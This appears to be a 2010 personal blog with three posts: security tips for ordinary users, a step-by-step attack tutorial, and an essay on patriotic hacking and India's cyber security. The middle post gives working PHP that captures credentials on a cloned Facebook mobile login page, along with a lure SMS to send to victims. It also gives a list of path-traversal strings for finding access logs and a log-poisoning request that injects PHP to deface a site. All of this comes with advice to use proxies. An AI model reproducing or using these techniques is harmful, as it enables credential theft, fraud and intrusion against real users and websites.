Monday, July 12, 2010
YOU ARE ON TARGET - Common User.
Okay, what if anybody takes access to my system, whats the big deal he can do? There has been endless possibilities what an attacker can do with access to your system. For an instance, they can delete or modify your data. They can get your login credentials to your email or social networking accounts. They can install nasty programs on your computer, can even send them to all your contacts, making propagation. Slow down your system speed. Worst of all, can use your computer to attack other major government or military systems, and erase their evidences, which can land you behind bars. As it is said, the next world war is going to happen on cables of internet and like any other war, it will attack on common man because he is a soft target and others do know it will make great impact. Thats why we need our community ready to face these forthcoming challenges. There has been many campaigns on increasing the awareness in common people about cyber security. Taking into consideration all these security risks, I am explaining below how we can avoid getting into trouble. Here I will cover how to be secure for a common user and will discuss money frauds and scams into nitty-gritty in next article. I'll try not to make these guidelines cumbersome to follow. But at last, your security is in your hands.
1. Use strong passwords:
Okay, so what do u mean by a strong password. How many of you have your name, birth date, mobile number, your lover's name, parent's name, name of your area where you live, similar to your username, your company name, favorite colour, or simple numbers (1,2,3,4,5,6 etc), the word "password", "password123" as your password? This is what hackers exploit. If a close one knows the above details about you (many of them do know), then they have actually nothing to do, but with a couple of failed attempts, they can gain access to your account. Which even a person with 0 hacking knowledge can do. Moreever, how many of you have a word appearing in dictionary as your password? What hackers do, they actually try all the words in dictionary as your password credential with automated programs (plenty of them are out there). While scanning the internet, my friend came across some systems sitting naked on internet. As they were asking for password, he tried a simple username password combination "admin-admin" and it actually worked! We had whole access to that particular system. It was a wireless router. This is not the only case. There has been thousands of computers, routers, servers accessible from net which have weak or no passwords. So, what are good passwords to keep? Following are some guidelines in making your password:
1. It should NOT be very common as mentioned above, it should not be any word in dictionary.
2. It should be long one (but only in the limits of your memory!)
3. It SHOULD contain both letters and numbers in random manner, even special characters are recommended.
4. It should not make any meaning.
5. It should be uppercase as well as lowercase if possible.
So, according to these rules, the word "password12" stands a bad password. "54235" stands a bad password as it contains only numbers and very less number of characters. "nomenclature" stands a bad password as it appears in dictionary. "whskw36" also stands a bad password as it contains only 7 characters. "love143" is a bad password as it makes some meaning. "um6ogisC11bgF" is a strong password as it satisfies all the conditions and becomes very difficult to crack. Further, following are some tips for the safety of passwords:
1. Don't write your password anywhere as any experienced person looking that block of letters can conclude that this might be your password.
2. Don't share it with anyone. I guess no need to explain this!
3. Do not use same password at all the places. Also consider how many passwords you can remember at a time.
4. Change your password at least once in a month. I know its cumbersome to follow but it can be checked if you implement the next things...
2. ALWAYS HAVE A LICENSED AND UPDATED ANTIVIRUS:
Get a good and licensed antivirus. They automatically update themselves on connecting to internet. Purchase it from trusted dealer only. This is one investment which you have to do. Dont download it from torrents or from other sites which comes with cracks. From outside, they might seem running well, but from inside, any trojan virus must be planted behind them! So, get them running by purchasing only. Also if the validity expires, it is necessary to renew them as soon as possible because antiviruses can avoid most of the ways in which your security could be compromised. It is recommended to scan your computer once in a week. Having a firewall is also advised. Firewall is a software which blocks illegal connections or attempts a hacker makes from internet. I recommend quick heal antivirus which comes with firewall and further, it is one of the top antiviruses of the world.
3. CAREFUL ABOUT WHAT YOU DOWNLOAD:
On downloading something, get it scanned with antivirus and confirm that there are no viruses in that before running it. Confirm that it is from a trusted source. Be alert when you download something from warez or torrents. Same is the case with email attachments. Also beware of unknown ".exe" files. They are most likely to be having a virus. Just one mantra, Get them scanned first!
4. EMAILS:
There is nothing going to happen you if you don't forward any message! You must be getting many of such emails like, this is an image of god, the person who didn't forward this, died on the next day, the one who forwarded, got 10000$ in the next day. Believe me, all those are hoax. They are nonsense mails just to force the user in spreading the mail more and more. I recommend that you delete them without reading. Some of such hoax emails have some malicious programs even in the images inside them. These images actually track where the mail is being received and forwarded to their maker. So, do not fall prey to these traps.
5. PHISHING:
Phishing is an act of impersonating to be something legitimate and tricking the user into giving their credentials. Basically its a login page looking similar to original one but when you enter the credentials, it has gone to the hacker. Have you ever received any mail asking you to click on any link to verify your account? beware, it might be phishing attempt. What are the countermeasure to phishing?
1. Always check from where you got the mail. webmail@icicibank.com or mailinglist@icicibank.com are legitimate one but admin@icicbanks.com (note the spelling difference) or icicibank@gmail.com are not.
2. Whenever you are logging in to trusted websites, check the URL... If it is https://.... then you can be sure that it is secure (https stands for secure), but if it is http://.... then go on checking further...
3. Check if it is actual website address. i.e. www.icicibank.com/.... is correct, but 209.88.232.34/... or icicibank.110hosts.com/.... or www.bankicici.com/.... are not legitimate!!
One more example.. http://orkut.xp.com/ , http://new.0rkut.com/ are fake ones.
Generally legitimate websites will not ask you to click on any link (unless in case of registering your account). Mostly they will ask you to visit their websites directly. One more thing, avoid copy pasting codes in address bars and hitting enter. You might have seen this stuff on orkut. Actually those javascript codes will give the attacker access to your account. For more information about phishing, go through my phishing article.
6. SCAMS:
There is nothing free in this world. Have you ever got any lottery for which you never applied for? Actually these are scams to get money from you. These days, such sms have also started circulating. Once again, do not respond to emails which claim that you have won a lucky draw and asking you to follow the procedure. People falling prey to these have ended up in losing their money itself. I wont go in much details of this kind of fraud. I will cover money frauds in next article.
7. Never reveal your personal information to strangers:
Okay, this is little bit off topic. but for your personal safety.
Following can make up this:
1. don't give your phone number to any unknown person unless you are sure they are verified.
2. Same thing for address, avoid sharing it.
3. Be careful about sending your photos to ones whom you don't know well.
4. Not necessary that any person would be similar to the depiction done by their profile or photos. So, be cautious about meeting any online friend in personal.
5. Don't get forced into disputes or any offensive matter, just remove and ignore the person who has been offensive or asking you for help in any bad or personal matter. Misspells from offenders are their daily business but could hurt you a lot. So, learn to simply ignore them.
8. Get the softwares updated. There may have been some security risks with previous versions. So, it is necessary to update them whenever new update has been released. Also its advisable to use the latest operating system such as windows 7 over XP.
9. Always clear all sort of internet browsing history. You can use firefox for web browsing. After your work is finished, you can simply delete all the history by going under Tools menu. During browsing, many unwanted programs, malicious scripts and pieces of code gets downloaded to your computer. It is harmful if they are kept for long as they can eventually gain whole access to your computer. Clearing the history before shutting down the computer is a good habit to follow.
10. Always scan external drives before exploring them as they might possess a threat.
Okay, that's it for the user security. Hope you like it. Don't forget to comment. In next article, I will cover money frauds. Enjoy!
Monday, June 14, 2010
SMS phishing
Here we are making fake mobile login of facebook.
What happens?
Victim receives a sms on his mobile apparently from facebook asking to try out new version of facebook. A link is provided in the sms. The victim opens the link, sees the facebook login page. He makes the login and it shows username/password is wrong. He gets phished...
To proceed ahead, you need to have a web server running on your computer connected to internet and mobile number of the victim.
Process:
SETTING UP YOUR PHISHING PAGE.
Go to http://m.facebook.com and copy the source code. Place it your web server's public html folder with ".htm" as extension. Open this html file in notepad and go to the form tag. In that, replace the form method from POST to GET. Change the form action value to write.php (you can change the name if you want). Rename the file as "index.htm". Create another file and name it as "write.php". Open write.php and copy the following content to the same. Save it.
[code]
<*?php
header("Location: http://m.facebook.com/login.php?m=m&r811c1f38&refid=9&rdd9db9a5&e=iep&r1129f1e6");
$handle = fopen("pswd.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?*>
[/code]
Also create another file pswd.txt and leave it as it is. This is the file where our usernames and passwords are getting stored.
You can store these files in any directory under public html. Remember to keep the name of directory something like facebook or similar.
Now start the server.
CHECKING IF OUR PHISHING PAGE IS WORKING.
go to cmyip.com to know your ip address. Paste this ip address in address bar. You should see your phishing page or your default index.htm(if the files are stored in any directory under public html). If not, following maybe the reasons for it:
1. You maybe behind a router. So, you need to open router's settings and enable port forwarding to your machine.
2. Your server maybe configured not to allow any outside connections. So, check out access settings and enable outside connections.
3. Your server may not be running properly.
Now, you need to navigate to the directory in which our phishing files are stored. for example, my files are in /smsphish under public html. So, i'll navigate to...
http://myipaddress/smsphish/
There you can see the fake login of facebook. You can enter any fake stuff in username and password field. Press enter. It should redirect you to the actual facebook mobile site. Now, open our pswd.txt file and see if our entered details are logged there. If they are, our work is mostly done. if they are not, check that you have made necessary changes in index.htm and the write.php is not tampered.
Now nearly 90% work is done. We move to the last step...
SENDING THE SMS.
Now you have to find free smsing sites which do not require to register. These sites use their own number for sending messeages. You can find many such sites. One word: Google. Now here comes our social engineering techniques. Just type the message like "Experience the brand new, more secure version of facebook, simply follow the link,.. blah blah" and give link to our phishing page. A sample message would look like this.
[code]
Experience the brand new version of facebook! Faster and secure. Follow the link now:
http://youripaddress/yourdirectory/
-Facebook development team.
[/code]
You can think of many more luring techniques... just think!
Enter the victim's mobile number and send the message! (recommended use proxy) If he opens the message and link, he will see the normal facebook mobile login and if he enters the correct details, our phishing worked! just keep watch on pswd.txt for their details!
Note: Be careful when running server!
defacing when access.log is accessible
I have tested it on wampserver (apache version 2.2.11 dont know about others). So, here I am going to show how we can change/deface any page on the server if the access log is accessible.
How to access the access.log?
For that, you need to find a LFI vulnerability on target site. and from that LFI, you can include access log. Here are some probable locations of access.log.
../apache/logs/access.log
../../apache/logs/access.log
../../../apache/logs/access.log
../../../../../../../etc/httpd/logs/acces_log
../../../../../../../etc/httpd/logs/acces.log
../../../../../../../var/www/logs/access_log
../../../../../../../var/www/logs/access.log
../../../../../../../usr/local/apache/logs/access_ log
../../../../../../../usr/local/apache/logs/access. log
../../../../../../../var/log/apache/access_log
../../../../../../../var/log/apache2/access_log
../../../../../../../var/log/apache/access.log
../../../../../../../var/log/apache2/access.log
../../../../../../../var/log/access_log
../../../../../../../var/log/access.log
or simply you can use the dork (inurl:access.log). and you'll be surprised to see so many logs at handy!
Ok, so moving on...
If you find a website with access.log accessible, do the following steps.
make the following GET request to the website by means of telnet or anything else you wish.
GET /<*?php $vips='---DEFACED---'; $fp = fopen('--LOCATION OF THE WEBPAGE FROM LOG--', 'w'); fputs($fp, $vips); fclose($fp); ?*> HTTP/1.1
(remove the stars *)
but before making this GET request, you need to make some changes in it.. (double quotes in the GET request maybe escaped before logging, so, here i am not making use of them)
--DEFACED-- : you have to replace this by html code which will be placed as a defacement.
--LOCATION OF WEBPAGE FROM LOG-- : this is location of the webpage from the log. For example, if the log is in the directory 'logs' and webpage to deface is in the directory 'pages' and both are in directory 'web' then this value will be '../pages/index.htm' where index.htm is the name of page to deface.
after making these changes, make the get request to the website.
Here, what we have done, we have injected php code in access.log. what php code does, it changes the content of the index.htm to our provided html content. But this will happen only if we open access.log. So, now go to lfi page and include access.log from there or open the direct link to log which you may have found from dork.
The size of access.log maybe huge depending on popularity of website... but keep it loading.. after some time, when our malicious GET request will be loaded, then php code will be executed and if successful, we can see the defaced page... be sure to use a proxy! your ip address will be easily logged.
Saturday, February 6, 2010
Hacking And my Country
The term hacker and hacking make a negative impact on normal human's mind. People think of hackers as the new generation cyber criminals who take over control and destroy the information. Actually, hacking is not just fiddling out with information and hackers are not always hungry for destruction. Its media hype. There is something called ethical hacking which involves testing penetration into computers and networks and finding, fixing, securing loopholes. In short, ethical hacking is exactly opposite to what you were thinking of hacking till now. Actual hackers not necessary always work with underground communities. They can be security professionals, who have extensive knowledge of this field. Also known as white hats. Hacking is a vast field and it involves various tools, processes, methods depending on your target and what you want to exploit. There is not any central tool owning which the person is ready to get called as hacker. Extensive knowledge of programming, applications, networking, and tools is necessary for a hacker.
I have been in some groups of patriotic hackers. These patriotic hackers hack and deface websites mostly of their rival countries. This action gives them pleasure of doing something for country. There is nothing wrong in working for motherland. However, performing an illegal thing like hacking without any strong cause makes it as an offense. Here, one thing needs to be considered that most of the nations have patriotic hackers in them. When some major websites or networks of a country have been defaced by their rivals, they probably won’t keep quiet. Now the patriots of this nation will slam the other by attacking their websites. This results into a chain reaction. There starts a competition between hackers of two nations. This is where the concept ‘cyber war’ is introduced.
Our India is also, not far away from this threat. We have got plenty of rivals for our country. Internet is expanding at tremendous speed. It is reaching in each and every corner of world each day. As the internet is growing, more and more people are getting introduced to hacking. Many of them are taking up learning this. There is an increase in concern because most of the hacking knowledge is encompassed in circle of internet. There is not strong implementation of laws against cybercrime (which involves hacking) in many countries including India. Countries like china are even thought of supporting hackers. Pakistani hackers are also on prowl of getting juicy Indian targets. In some of the recent defacements of Indian websites, hackers apparent from Pakistan have given their strong political message against our country. Chinese hackers have also put forth their intimidation. However, Indian hackers are also not behind. They have replied back in the same coin very well. But this act is neither going to stop the chain not going to shield our country against hackers.
Here rises the need of security. No need to tell its importance in computer field. It is must to protect sensitive data and dignity. If security is not properly taken care of, it leads to its breach spoiling the image of target. It is becoming vital part of IT systems. Misuse of confidential information and loss of dignity are major consequences of security breach.
Now we are going to view the government approach over this. Government bodies who look after this are said to be lazy and careless about their work. As stated by our patriotic hackers, there are many vulnerabilities in our government websites. The systems and software they are using are outdated. They are not up to date with latest technologies. Many of them are not concerned in going into nitty-gritty of security and bringing about change. Just the defective part is removed and very few attempts are made to repair and restore stolen information. Tracing back the hacker is still a long way to go. This all has affected our standing in security. Even Indian anti viruses haven’t yet given tough competition for the race of top anti viruses.
So, what do we lack? Are there no laws against cybercrime and hacking? No. This is not the case. We have laws. But we lack in facilities offered to cyber security. This is ultimately due to short or corrupt donation provided to this. Due to shortage of facilities, there is no adequate implementation of laws. This makes fewer obstacles in the way of committing cybercrime. It’s even not the case that we lack talent. But we are unfortunate that India’s talent is serving other nations. Nothing else. This coin also has other side. There are Indian hackers who are willing to work for India in a positive way. What keeps them apart is the negative impression of the term ‘hacker’. Actually, there is nothing wrong in this. A knowledgeable person must get chance to work for the nation if he is willing to.
Finally, I am going to highlight the thing which can bring about the change. In India, media is said to have more power than government. Every day, media reaches to all roots of the society. If media takes a point at stake, the government has to act on it and stabilize the situation. We see media as the ray of hope for the sake of cyber security of our motherland.
In the end, I would like to say something,
“Whatever field you may go in, gain as much knowledge as you want, but don’t forget your responsibility for your motherland because this is the only place where you belong and can claim to be your own.”